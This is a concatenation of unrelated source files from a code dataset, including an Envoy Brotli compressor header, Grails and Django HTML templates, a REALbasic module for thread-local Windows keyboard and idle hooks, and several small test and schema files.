"MIT"
] |
#pragma once
#include "envoy/compression/compressor/factory.h"
#include "envoy/extensions/compression/brotli/compressor/v3/brotli.pb.h"
#include "envoy/extensions/compression/brotli/compressor/v3/brotli.pb.validate.h"
#include "source/common/http/headers.h"
#include "source/extensions/compression/brotli/compressor/brotli_compressor_impl.h"
#include "source/extensions/compression/common/compressor/factory_base.h"
namespace Envoy {
namespace Extensions {
namespace Compression {
namespace Brotli {
namespace Compressor {
namespace {
// Lazily-constructed singleton strings; CONSTRUCT_ON_FIRST_USE avoids
// static-initialization-order issues for non-trivially-destructible globals.
const std::string& brotliStatsPrefix() { CONSTRUCT_ON_FIRST_USE(std::string, "brotli."); }
const std::string& brotliExtensionName() {
  CONSTRUCT_ON_FIRST_USE(std::string, "envoy.compression.brotli.compressor");
}
} // namespace
// Creates BrotliCompressorImpl instances from the typed proto config; one
// factory per configured filter, one compressor per stream.
class BrotliCompressorFactory : public Envoy::Compression::Compressor::CompressorFactory {
public:
  BrotliCompressorFactory(
      const envoy::extensions::compression::brotli::compressor::v3::Brotli& brotli);

  // Envoy::Compression::Compressor::CompressorFactory
  Envoy::Compression::Compressor::CompressorPtr createCompressor() override;
  const std::string& statsPrefix() const override { return brotliStatsPrefix(); }
  // Value advertised in the Content-Encoding response header ("br").
  const std::string& contentEncoding() const override {
    return Http::CustomHeaders::get().ContentEncodingValues.Brotli;
  }

private:
  // Maps the proto enum onto the implementation's encoder-mode enum.
  static BrotliCompressorImpl::EncoderMode encoderModeEnum(
      envoy::extensions::compression::brotli::compressor::v3::Brotli::EncoderMode encoder_mode);

  // Tuning knobs captured from the proto config at construction time.
  const uint32_t chunk_size_;
  const bool disable_literal_context_modeling_;
  const BrotliCompressorImpl::EncoderMode encoder_mode_;
  const uint32_t input_block_bits_;
  const uint32_t quality_;
  const uint32_t window_bits_;
};
// Extension-registry entry point: validates the typed proto config and hands
// back a BrotliCompressorFactory. Registered under the extension name above.
class BrotliCompressorLibraryFactory
    : public Compression::Common::Compressor::CompressorLibraryFactoryBase<
          envoy::extensions::compression::brotli::compressor::v3::Brotli> {
public:
  BrotliCompressorLibraryFactory() : CompressorLibraryFactoryBase(brotliExtensionName()) {}

private:
  Envoy::Compression::Compressor::CompressorFactoryPtr createCompressorFactoryFromProtoTyped(
      const envoy::extensions::compression::brotli::compressor::v3::Brotli& config) override;
};

DECLARE_FACTORY(BrotliCompressorLibraryFactory);
} // namespace Compressor
} // namespace Brotli
} // namespace Compression
} // namespace Extensions
} // namespace Envoy
| C | 4 | dcillera/envoy | source/extensions/compression/brotli/compressor/config.h | [
"Apache-2.0"
] |
<%--
Copyright 2012 Netflix, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--%>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="layout" content="main"/>
    <title>Create New Fast Property</title>
</head>
<body>
<div class="body">
    <h1>Create New Fast Property</h1>
    <%-- Flash message and validation errors from a previous submit, if any. --%>
    <g:if test="${flash.message}">
        <div class="message">${flash.message}</div>
    </g:if>
    <g:hasErrors bean="${cmd}">
        <div class="errors">
            <g:renderErrors bean="${cmd}" as="list"/>
        </div>
    </g:hasErrors>
    <g:form action="save" method="post" class="validate">
        <div class="dialog">
            <%-- Rows with class "advanced" are hidden unless advanced attributes were
                 requested; the "Advanced Options" toggle below reveals them. --%>
            <table class="fastPropertyAttributes ${params.hasAdvancedAttributes ? '': 'hideAdvancedItems'}">
                <tbody>
                <tr class="prop">
                    <td class="name">
                        <label for="key">Name:</label>
                    </td>
                    <td class="value">
                        <g:textField class="fastPropertyValue required" id="key" name="key" value="${params.key}"/>
                    </td>
                </tr>
                <tr class="prop">
                    <td class="name">
                        <label for="value">Value:</label>
                    </td>
                    <td class="value">
                        <g:textArea cols="30" rows="3" class="fastPropertyValue" id="value" name="value" value="${params.value}"/>
                    </td>
                </tr>
                <tr class="prop">
                    <td class="name">
                        <label for="updatedBy">Updated by:</label>
                    </td>
                    <td class="value">
                        <g:textField class="required" id="updatedBy" name="updatedBy" placeholder="jsmith" value="${updatedBy}"/>
                        <span class="toggle fakeLink" id="showAdvancedOptionsToCreateFastProperty">Advanced Options</span>
                    </td>
                </tr>
                <g:if test="${fastPropertyInfoUrl}">
                    <tr>
                        <td colspan="2"><a href="${fastPropertyInfoUrl}">Fast Property Documentation</a></td>
                    </tr>
                </g:if>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="ttl">TTL:</label>
                    </td>
                    <td class="value">
                        <g:textField id="ttl" name="ttl" value="${params.ttl}"/>
                        <g:select name="ttlUnit" value="${params.ttlUnit ?: 'Days'}" from="${ttlUnits}" />
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="constraints">Constraints:</label>
                    </td>
                    <td class="value">
                        <g:textField id="constraints" name="constraints" value="${params.constraints}"/>
                    </td>
                </tr>
                <%-- Scoping rows: each field narrows where the property applies,
                     listed from most to least specific. --%>
                <tr>
                    <td colspan="2">
                        <h2>Scoping (highest priority first):</h2>
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="serverId">Instance ID:</label>
                    </td>
                    <td class="value">
                        <g:textField id="serverId" name="serverId" value="${params.serverId}"/>
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="asg">ASG:</label>
                    </td>
                    <td class="value">
                        <g:select name="asg" noSelection="['':'Default (all ASGs)']" value="${params.asg}" from="${asgNames}"
                                  class="allowEmptySelect" />
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="ami">AMI:</label>
                    </td>
                    <td class="value">
                        <g:select name="ami" noSelection="['':'Default (all AMIs)']" value="${params.ami}" from="${images}"
                                  optionKey="imageId" optionValue="imageLocation" class="allowEmptySelect" />
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="cluster">Cluster:</label>
                    </td>
                    <td class="value">
                        <g:select name="cluster" noSelection="['':'Default (all clusters)']" value="${params.cluster}" from="${clusterNames}"
                                  class="allowEmptySelect" />
                    </td>
                </tr>
                <tr class="prop">
                    <td valign="top" class="name">
                        <label for="appId">Application:</label>
                    </td>
                    <td>
                        <g:select title="The application that this property is used for"
                                  name="appId" noSelection="['':'Default (all apps)']" value="${params.appId}" from="${appNames}"
                                  class="allowEmptySelect" />
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="countries">Countries:</label>
                    </td>
                    <td class="value">
                        <g:textField id="countries" name="countries" value="${params.countries}"/>
                    </td>
                </tr>
                <tr class="prop">
                    <td class="name">
                        <label for="stack">Stack:</label>
                    </td>
                    <td class="value">
                        <g:textField id="stack" name="stack" value="${params.stack}"/>
                    </td>
                </tr>
                <tr class="prop advanced">
                    <td class="name">
                        <label for="zone">Zone:</label>
                    </td>
                    <td class="value">
                        <g:select name="zone" noSelection="['':'Default (all zones)']" value="${params.zone}" from="${zoneNames}"
                                  class="allowEmptySelect" />
                    </td>
                </tr>
                <tr class="prop">
                    <td valign="top" class="name">
                        <label for="fastPropertyRegion">Region:</label>
                    </td>
                    <td>
                        <g:select title="The AWS region that this property is used in, or blank for all regions"
                                  name="fastPropertyRegion" noSelection="['':'Default (all regions)']"
                                  value="${params.fastPropertyRegion}" from="${regionOptions}" class="allowEmptySelect"
                                  optionKey="code" optionValue="description"/>
                    </td>
                </tr>
                </tbody>
            </table>
        </div>
        <div class="buttons">
            <g:buttonSubmit class="save" value="save">Create New Fast Property</g:buttonSubmit>
        </div>
    </g:form>
</div>
</body>
</html>
| Groovy Server Pages | 3 | claymccoy/asgard | grails-app/views/fastProperty/create.gsp | [
"Apache-2.0"
] |
unique template site/one/onevm;
# Quattor template for OpenNebula-managed VMs: pulls in chkconfig, binds the
# OpenNebula VM template map, then layers site VM config and AII defaults.
include 'components/chkconfig/config';
# set opennebula map
include 'quattor/aii/opennebula/schema';
bind "/system/opennebula" = opennebula_vmtemplate;
include 'site/config-vm';
include 'quattor/aii/opennebula/default';
# Install acpid and enable it at boot — presumably so the guest reacts to
# ACPI power events from the hypervisor; confirm with the site operators.
"/software/packages/{acpid}" = dict();
"/software/components/chkconfig/service/acpid" = dict('on', '', 'startstop', true);
| Pan | 3 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Pan/onevm.pan | [
"MIT"
] |
// Regression test (webpack issue 2221): merely requiring the module is the
// test — compilation of its semicolon-free, non-immutable exports must succeed.
it("should compile non-immutable exports with missing semicolons", () => {
	require("./exportvar");
});
| JavaScript | 2 | 1shenxi/webpack | test/cases/compile/issue2221/index.js | [
"MIT"
] |
#tag Module
Protected Module HooksWFS
#tag Method, Flags = &h21
	Private Function IdleHookCallbackFunction(nCode as Integer, wParam as Integer, lParam as Integer) As Integer
	  ' WH_FOREGROUNDIDLE hook procedure: forwards the notification to the
	  ' registered IdleHandlerWFS, then chains to the next hook in the chain
	  ' via CallNextHookEx (required hook-procedure etiquette on Windows).
	  if nCode >= 0 then
	    if mIdleHandler <> nil then
	      ' Call the idle handler for the user
	      mIdleHandler.Idle
	    end
	  end if
	  
	  #if TargetWin32
	    Soft Declare Function CallNextHookEx Lib "User32" ( hookHandle as Integer, code as Integer, _
	    wParam as Integer, lParam as Integer ) as Integer
	    
	    ' And make sure we call the next hook in the list
	    return CallNextHookEx( mIdleHandlerHook, nCode, wParam, lParam )
	  #else
	    ' Non-Windows builds: parameters unused, no hook chain to continue.
	    #pragma unused wParam
	    #pragma unused lParam
	  #endif
	End Function
#tag EndMethod
#tag Method, Flags = &h1
	Protected Sub InstallIdleHook(i as IdleHandlerWFS)
	  ' Installs a WH_FOREGROUNDIDLE hook on the current thread so that `i`
	  ' receives Idle callbacks. Only one handler may be installed at a time;
	  ' a second call while a hook is active is silently ignored.
	  ' If we already have an idle handler, then we
	  ' cannot install a new one. Just bail out
	  if mIdleHandlerHook <> 0 then return
	  
	  #if TargetWin32
	    Declare Function SetWindowsHookExA Lib "User32" ( hookType as Integer, proc as Ptr, _
	    instance as Integer, threadID as Integer ) as Integer
	    Declare Function GetCurrentThreadId Lib "Kernel32" () as Integer
	    
	    ' Store the idle handler
	    mIdleHandler = i
	    
	    Const WH_FOREGROUNDIDLE = 11
	    
	    // Well if this isn't about as strange as you can get... I tried turning this into a
	    // Unicode-savvy function, but couldn't make a go of it. Using the exact same
	    // code (only the W version of SetWindowsHookEx) causes a crash to occur
	    // immediately after the call returns. I wasn't able to find any information about
	    // why the crash was happening, and it doesn't make any sense (the Windows is
	    // a Unicode window, so there's no mixed-type calls). Since this function doesn't
	    // deal with strings, there's no real benefit to making it Unicode-savvy, so I'm leaving
	    // the function as-is.
	    
	    ' And install the handler (thread-local hook: GetCurrentThreadId, not global)
	    mIdleHandlerHook= SetWindowsHookExA( WH_FOREGROUNDIDLE, AddressOf IdleHookCallbackFunction, _
	    0, GetCurrentThreadId )
	  #else
	    #pragma unused i
	  #endif
	End Sub
#tag EndMethod
#tag Method, Flags = &h1
	Protected Function InstallKeyboardHook(attachTo as KeyboardHookHandlerWFS) As Boolean
	  ' Installs a WH_KEYBOARD hook on the current thread, routing key events to
	  ' `attachTo`. Returns True on success; False if `attachTo` is nil, a
	  ' handler is already attached, or SetWindowsHookEx fails.
	  ' If we already have an idle handler, then we
	  ' cannot install a new one. Just bail out
	  if attachTo = nil then return false
	  if mAttached <> nil then return false
	  
	  #if TargetWin32
	    Declare Function SetWindowsHookExA Lib "User32" ( hookType as Integer, proc as Ptr, _
	    instance as Integer, threadID as Integer ) as Integer
	    Declare Function GetCurrentThreadId Lib "Kernel32" () as Integer
	    
	    ' Store the keyboard handler
	    mAttached = attachTo
	    
	    ' And install the handler (thread-local, like the idle hook)
	    Const WH_KEYBOARD = 2
	    mKeyboardHookHandle = SetWindowsHookExA( WH_KEYBOARD, AddressOf KeyboardHookCallbackFunction, 0, GetCurrentThreadId )
	  #endif
	  
	  return mKeyboardHookHandle <> 0
	End Function
#tag EndMethod
#tag Method, Flags = &h21
	Private Function KeyboardHookCallbackFunction(nCode as Integer, wParam as Integer, lParam as Integer) As Integer
	  ' WH_KEYBOARD hook procedure: hands the raw wParam/lParam pair to the
	  ' attached handler, then chains to the next hook via CallNextHookEx.
	  if nCode >= 0 and mAttached <> nil then
	    ' Call the keyboard handler for the user
	    mAttached.KeyboardProc( wParam, lParam )
	  end
	  
	  #if TargetWin32
	    Declare Function CallNextHookEx Lib "User32" ( hookHandle as Integer, code as Integer, _
	    wParam as Integer, lParam as Integer ) as Integer
	    
	    ' And make sure we call the next hook in the list
	    return CallNextHookEx( mKeyboardHookHandle, nCode, wParam, lParam )
	  #endif
	End Function
#tag EndMethod
#tag Method, Flags = &h1
	Protected Sub RemoveIdleHook()
	  ' Unhooks the idle hook installed by InstallIdleHook. No-op if none is
	  ' installed. NOTE(review): mIdleHandlerHook/mIdleHandler are not reset
	  ' here, so a subsequent InstallIdleHook call would still bail out — verify
	  ' whether that is intended.
	  ' If we don't have an idle handler, then we
	  ' can just bail out
	  if mIdleHandlerHook = 0 then return
	  
	  #if TargetWin32
	    Declare Sub UnhookWindowsHookEx Lib "User32" ( hookHandle as Integer )
	    UnhookWindowsHookEx( mIdleHandlerHook )
	  #endif
	End Sub
#tag EndMethod
#tag Method, Flags = &h1
	Protected Sub RemoveKeyboardHook()
	  ' Unhooks the keyboard hook installed by InstallKeyboardHook. No-op if
	  ' none is installed. NOTE(review): mKeyboardHookHandle/mAttached are not
	  ' cleared here, so re-installation would still be refused — verify intent.
	  ' If we don't have an keyboard handler, then we
	  ' can just bail out
	  if mKeyboardHookHandle = 0 then return
	  
	  #if TargetWin32
	    Declare Sub UnhookWindowsHookEx Lib "User32" ( hookHandle as Integer )
	    UnhookWindowsHookEx( mKeyboardHookHandle )
	  #endif
	End Sub
#tag EndMethod
#tag Method, Flags = &h1
	Protected Function TranslateKeyToString(lParam as Integer) As String
	  ' Translates a keyboard-hook lParam into a human-readable key name via
	  ' GetKeyNameText, preferring the Unicode (W) entry point when available
	  ' and falling back to the ANSI (A) variant on older systems.
	  ' Returns an empty string on non-Windows targets.
	  #if TargetWin32
	    Soft Declare Function GetKeyNameTextW Lib "User32" ( lParam as Integer, _
	    theStr as Ptr, theStrLen as Integer ) as Integer
	    Soft Declare Function GetKeyNameTextA Lib "User32" ( lParam as Integer, _
	    theStr as Ptr, theStrLen as Integer ) as Integer
	    
	    ' 25-byte scratch buffer for the key name; trueLen receives the
	    ' number of characters copied (currently unused beyond the call).
	    dim mb as new MemoryBlock( 25 )
	    dim trueLen as Integer
	    if System.IsFunctionAvailable( "GetKeyNameTextW", "User32" ) then
	      trueLen = GetKeyNameTextW( lParam, mb, mb.Size )
	      return mb.WString( 0 )
	    else
	      trueLen = GetKeyNameTextA( lParam, mb, mb.Size )
	      return mb.CString( 0 )
	    end if
	  #else
	    #pragma unused lParam
	  #endif
	End Function
#tag EndMethod
#tag Property, Flags = &h21
Private mAttached As KeyboardHookHandlerWFS
#tag EndProperty
#tag Property, Flags = &h21
Private mIdleHandler As IdleHandlerWFS
#tag EndProperty
#tag Property, Flags = &h21
Private mIdleHandlerHook As Integer
#tag EndProperty
#tag Property, Flags = &h21
Private mKeyboardHookHandle As Integer
#tag EndProperty
#tag ViewBehavior
#tag ViewProperty
Name="Index"
Visible=true
Group="ID"
InitialValue="-2147483648"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Left"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Name"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Super"
Visible=true
Group="ID"
InheritedFrom="Object"
#tag EndViewProperty
#tag ViewProperty
Name="Top"
Visible=true
Group="Position"
InitialValue="0"
InheritedFrom="Object"
#tag EndViewProperty
#tag EndViewBehavior
End Module
#tag EndModule
| REALbasic | 4 | bskrtich/WFS | Windows Functionality Suite/Miscellaneous/Modules/HooksWFS.rbbas | [
"MIT"
] |
<html>
<head>
<title>AutoMLBoard</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
{% load staticfiles %}
<!-- jquery and bootstrap dependency -->
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1" crossorigin="anonymous"></script>
<!-- bootstrap table dependency -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-table/1.12.1/bootstrap-table.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-table/1.12.1/bootstrap-table.min.js"></script>
<link rel="stylesheet" href="/static/css/bootstrap.min.css">
<link rel="stylesheet" href="/static/css/App.css">
<link rel="stylesheet" href="/static/css/HomePage.css">
<link rel="stylesheet" href="/static/css/ExperimentView.css">
<script src="/static/js/ExperimentList.js"></script>
<link rel="stylesheet" href="/static/css/ExperimentList.css">
<!-- awesome dependency -->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-primary" style="margin-right: auto;margin-left: auto;">
<a class="navbar-brand" href="#" style="padding-left: 50px">AutoMLBoard</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor01" aria-controls="navbarColor01" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarColor01">
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="/">Home <span class="sr-only">(current)</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://github.com/ray-project/ray">Github</a>
</li>
<li class="nav-item">
<a class="nav-link" href="http://docs.ray.io/">Document</a>
</li>
</ul>
</div>
</nav>
<div class="container" style="max-width: none">
<div class="outer-container row" id = "row-main">
<div class="HomePage-experiment-list-container col-md-2" id="sidebar">
<div>
<div class="collapsed-expander-container">
<div class="experiment-list-outer-container">
<div><h1 class="experiments-header">Experiments</h1>
<div class="collapser-container" onclick="collapse_experiment_list()">
<i class="collapser fa fa-chevron-left login-icon"></i>
</div>
<div class="experiment-list-container" style="height: 800px;">
<ul class="nav nav-pills flex-column">
{% for job in recent_jobs %}
<tr>
<li class="nav-item">
<a class="nav-link" href="job?job_id={{ job.job_id }}">{{ job.job_id }}</a>
</li>
</tr>
{% endfor %}
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="experiment-view-container col-md-8" id="content">
<div class="ExperimentPage">
<div>
<div class="ExperimentView">
<h1>{{ current_job.job_id }}</h1>
<hr class="divider"/>
<div class="metadata" style="max-width: 900px;">
<span class="metadata">
<span class="metadata-header">User:</span>
{{ current_job.user }}
</span>
<span class="metadata" style="margin-right: 0px">
<span class="metadata-header">Progress:
</span>
<span>{{ current_job.total_num }} Trials</span>
<span class="badge badge-pill badge-info" style="margin-left: 10px; border-radius: 0.3em">{{ current_job.running_num }} Running</span>
<span class="badge badge-pill badge-success" style="border-radius: 0.3em">{{ current_job.success_num }} Success</span>
<span class="badge badge-pill badge-danger" style="border-radius: 0.3em">{{ current_job.failed_num }} Failed</span>
<span class="progress"
style="width: 150px; float: right; margin-right: 120px; margin-top: 5px">
<span class="progress-bar bg-success" role="progressbar" style="width: {{ current_job.progress }}%;"></span>
</span>
</span>
<span class="metadata" style="line-height: 40px">
<span class="metadata-header">Start Time:</span>
{{ current_job.start_time }}
</span>
</div>
<div class="ExperimentView-runs">
<hr class="divider"/>
<table class="table table-hover"
id="trial_table"
data-toggle="table"
data-show-columns="true"
data-show-export="true"
data-minimum-count-columns="2"
data-id-field="id"
data-show-pagination-switch="true"
data-page-list="[10, 25, 50, 100, ALL]"
data-pagination="true"
style="border: none; max-height: 800px">
<thead>
<tr>
<th class="top-row" scope="colgroup" colspan="4">Trials</th>
<th class="top-row left-border" scope="colgroup" colspan="{{ param_num }}">Parameters</th>
<th class="top-row left-border" scope="colgroup" colspan="{{ metric_num }}">Metrics</th>
</tr>
<tr>
<th class="bottom-row" data-field="Trial-ID" data-sortable="true">Trial-ID</th>
<th class="bottom-row" data-field="Status" data-sortable="true">Status</th>
<th class="bottom-row" data-field="Start Time" data-sortable="true">Start Time</th>
<th class="bottom-row" data-field="End Time" data-sortable="true">End Time</th>
{% for param in param_keys %}
<th class="bottom-row" data-field="{{ param }}" data-sortable="true">{{ param }}</th>
{% endfor %}
{% for metric in metric_keys %}
<th class="bottom-row" data-field="{{ metric }}"
data-sortable="true">{{ metric }}</th>
{% endfor %}
</tr>
</thead>
<tbody>
{% for trial in recent_trials %}
<tr>
<td><a href="/trial?job_id={{ trial.job_id }}&trial_id={{ trial.trial_id }}">{{ trial.trial_id }}</a></td>
<td>{{ trial.trial_status}} <!--a href="#">(Kill)</a--></td>
<td>{{ trial.start_time }}</td>
<td>{{ trial.end_time }}</td>
{% for param in trial.params.items %}
<td>{{ param.1 }}</td>
{% endfor %}
<td>{{ trial.metrics.episode_reward }}</td>
<td>{{ trial.metrics.loss }}</td>
<td>{{ trial.metrics.accuracy }}</td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
<div class="experiment-view-right"></div>
</div>
</div>
</body>
</html> | HTML | 3 | firebolt55439/ray | python/ray/tune/automlboard/templates/job.html | [
"Apache-2.0"
] |
// @target: es5
// @module: esnext
// @experimentalDecorators: true
declare function foo(...args: any[]): any;
@foo
export default class C {
static x() { return C.y; }
static y = 1
p = 1;
method() { }
} | TypeScript | 3 | nilamjadhav/TypeScript | tests/cases/conformance/externalModules/esnext/esnextmodulekindWithES5Target11.ts | [
"Apache-2.0"
] |
<div class="attribute" {{modifier}} {{! comment}}>
Hello
</div>
<div>
Hello
</div>
<div>
hi
</div>
<div>
A long enough string to trigger a line break that would prevent wrapping.
</div>
<div>
A long enough string to trigger a line break that would prevent wrapping more.
</div>
<div>
A long enough string to trigger a line break that would prevent wrapping more and more.
</div>
<div>
{{#block}}
{{hello}}
{{/block}}
</div>
<div>
{{hello}}
</div>
<div></div>
<img />
<MyComponent @prop={{true}} @prop2={{true}} @prop3={{true}} @prop4={{true}} as |thing|></MyComponent>
| Handlebars | 2 | tumido/prettier | tests/format/handlebars/element-node/element-node.hbs | [
"MIT"
] |
//
// DoraemonDemoImageViewController.h
// DoraemonKitDemo
//
// Created by yixiang on 2019/6/18.
// Copyright © 2019年 yixiang. All rights reserved.
//
#import "DoraemonDemoBaseViewController.h"
NS_ASSUME_NONNULL_BEGIN
@interface DoraemonDemoImageViewController : DoraemonDemoBaseViewController
@end
NS_ASSUME_NONNULL_END
| C | 3 | wangfengye/DoraemonKit | iOS/DoraemonKitDemo/DoraemonKitDemo/DemoVC/Net/Image/DoraemonDemoImageViewController.h | [
"Apache-2.0"
] |
size: 2048px 1200px;
dpi: 240;
limit-x: 1 5;
limit-y: 0 10000;
scale-y: log;
axes {
label-format-y: base(10);
}
grid {
color: rgba(0 0 0 0.05);
}
lines {
data-x: csv("test/testdata/log_example.csv" x);
data-y: csv("test/testdata/log_example.csv" y);
}
| CLIPS | 3 | asmuth-archive/travistest | test/examples/charts_custom_logarithmic_scale.clp | [
"Apache-2.0"
] |
<mat-expansion-panel>
<mat-expansion-panel-header>
<mat-panel-title>
Enabled-by-default column resize for MatTable
</mat-panel-title>
</mat-expansion-panel-header>
<default-enabled-column-resize-example></default-enabled-column-resize-example>
</mat-expansion-panel>
<mat-expansion-panel>
<mat-expansion-panel-header>
<mat-panel-title>
Enabled-by-default column resize for flex MatTable
</mat-panel-title>
</mat-expansion-panel-header>
<default-enabled-column-resize-flex-example></default-enabled-column-resize-flex-example>
</mat-expansion-panel>
<mat-expansion-panel>
<mat-expansion-panel-header>
<mat-panel-title>
Opt-in column resize for MatTable
</mat-panel-title>
</mat-expansion-panel-header>
<opt-in-column-resize-example></opt-in-column-resize-example>
</mat-expansion-panel>
| HTML | 4 | tungyingwaltz/components | src/dev-app/column-resize/column-resize-home.html | [
"MIT"
] |
@import './child.css';
h1 {
color: gray;
}
| CSS | 2 | acidburn0zzz/parcel | packages/examples/kitchen-sink/src/styles.css | [
"MIT"
] |
.foo {margin:var( --n-gutterSize) 0 var( --gutterSize ) var( --n-gutterSize );
}
| CSS | 2 | fuelingtheweb/prettier | tests/stylefmt/var-notation/var-notation.css | [
"MIT"
] |
package com.bumptech.glide.testutil;
import static com.google.common.truth.Truth.assertThat;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
/** Shared utility classes for tests. */
// Public API.
@SuppressWarnings("WeakerAccess")
public final class TestUtil {
private TestUtil() {
// Utility class.
}
public static byte[] resourceToBytes(Class<?> testClass, String resourceName) throws IOException {
return isToBytes(TestResourceUtil.openResource(testClass, resourceName));
}
public static byte[] isToBytes(InputStream is) throws IOException {
ByteArrayOutputStream os = new ByteArrayOutputStream();
byte[] buffer = new byte[1024];
int read;
try {
while ((read = is.read(buffer)) != -1) {
os.write(buffer, 0, read);
}
} finally {
is.close();
}
return os.toByteArray();
}
public static String isToString(InputStream is) throws IOException {
return new String(isToBytes(is), "utf-8");
}
public static void assertStreamOf(String expected, InputStream result) throws IOException {
assertThat(expected).isEqualTo(isToString(result));
}
}
| Java | 4 | qq411860630/glide | testutil/src/main/java/com/bumptech/glide/testutil/TestUtil.java | [
"Apache-2.0"
] |
RSpec.shared_examples_for 'Msf::DBManager::Import::Spiceworks' do
it { is_expected.to respond_to :import_spiceworks_csv }
end
| Ruby | 3 | OsmanDere/metasploit-framework | spec/support/shared/examples/msf/db_manager/import/spiceworks.rb | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
--TEST--
Bug #38850 (lookupNamespaceURI does not return default namespace)
--EXTENSIONS--
dom
--FILE--
<?php
$xml = <<<HERE
<?xml version="1.0" ?>
<foo xmlns="http://www.example.com/ns/foo" />
HERE;
$doc = new DOMDocument();
$doc->loadXML($xml);
$root = $doc->documentElement;
print $root->lookupNamespaceURI(NULL);
?>
--EXPECT--
http://www.example.com/ns/foo
| PHP | 3 | NathanFreeman/php-src | ext/dom/tests/bug38850.phpt | [
"PHP-3.01"
] |
@0x9ef128e10a8010b2;
struct NullableUInt64
{
union
{
value @0 : UInt64;
null @1 : Void;
}
}
struct Tuple
{
nullable @0 : NullableUInt64;
}
struct Message
{
nullable @0 : NullableUInt64;
array @1 : List(NullableUInt64);
tuple @2 : Tuple;
}
| Cap'n Proto | 2 | pdv-ru/ClickHouse | tests/queries/0_stateless/format_schemas/02030_capnp_nullable.capnp | [
"Apache-2.0"
] |
-@ import val it: InvoiceInfo
%h1 Paid Invoice
- for { invoice <- paidInvoiceOption }
- render(webPath("Invoice.scaml"), Map("invoice" -> invoice))
- render(webPath("InvoiceAddress.scaml"), Map("address" -> invoice.address))
| Scaml | 3 | pkeshab/eventsourced-example | src/main/webapp/WEB-INF/org/eligosource/eventsourced/example/web/Invoice.paid.scaml | [
"Apache-2.0"
] |
sleep 1
t app key mode
sleep 5
t app key record
sleep 1
reboot yes
| AGS Script | 1 | waltersgrey/autoexechack | HERO/TimeLapse/10Seconds/autoexec.ash | [
"MIT"
] |
/**
* This file is part of the Phalcon Framework.
*
* (c) Phalcon Team <team@phalcon.io>
*
* For the full copyright and license information, please view the LICENSE.txt
* file that was distributed with this source code.
*/
namespace Phalcon\Mvc\Micro;
use Phalcon\Mvc\Micro;
/**
* Allows to implement Phalcon\Mvc\Micro middleware in classes
*/
interface MiddlewareInterface
{
/**
* Calls the middleware
*/
public function call(<Micro> application);
}
| Zephir | 4 | tidytrax/cphalcon | phalcon/Mvc/Micro/MiddlewareInterface.zep | [
"BSD-3-Clause"
] |
import createSvgIcon from './utils/createSvgIcon';
import { jsx as _jsx } from "react/jsx-runtime";
export default createSvgIcon([/*#__PURE__*/_jsx("path", {
d: "M12 5c-1.93 0-5 4.91-5 9 0 2.76 2.24 5 5 5s5-2.24 5-5c0-4.09-3.07-9-5-9zm1 13c-3.01 0-5-2-5-5 0-.55.45-1 1-1s1 .45 1 1c0 2.92 2.42 3 3 3 .55 0 1 .45 1 1s-.45 1-1 1z",
opacity: ".3"
}, "0"), /*#__PURE__*/_jsx("path", {
d: "M12 3C8.5 3 5 9.33 5 14c0 3.87 3.13 7 7 7s7-3.13 7-7c0-4.67-3.5-11-7-11zm0 16c-2.76 0-5-2.24-5-5 0-4.09 3.07-9 5-9s5 4.91 5 9c0 2.76-2.24 5-5 5z"
}, "1"), /*#__PURE__*/_jsx("path", {
d: "M13 16c-.58 0-3-.08-3-3 0-.55-.45-1-1-1s-1 .45-1 1c0 3 1.99 5 5 5 .55 0 1-.45 1-1s-.45-1-1-1z"
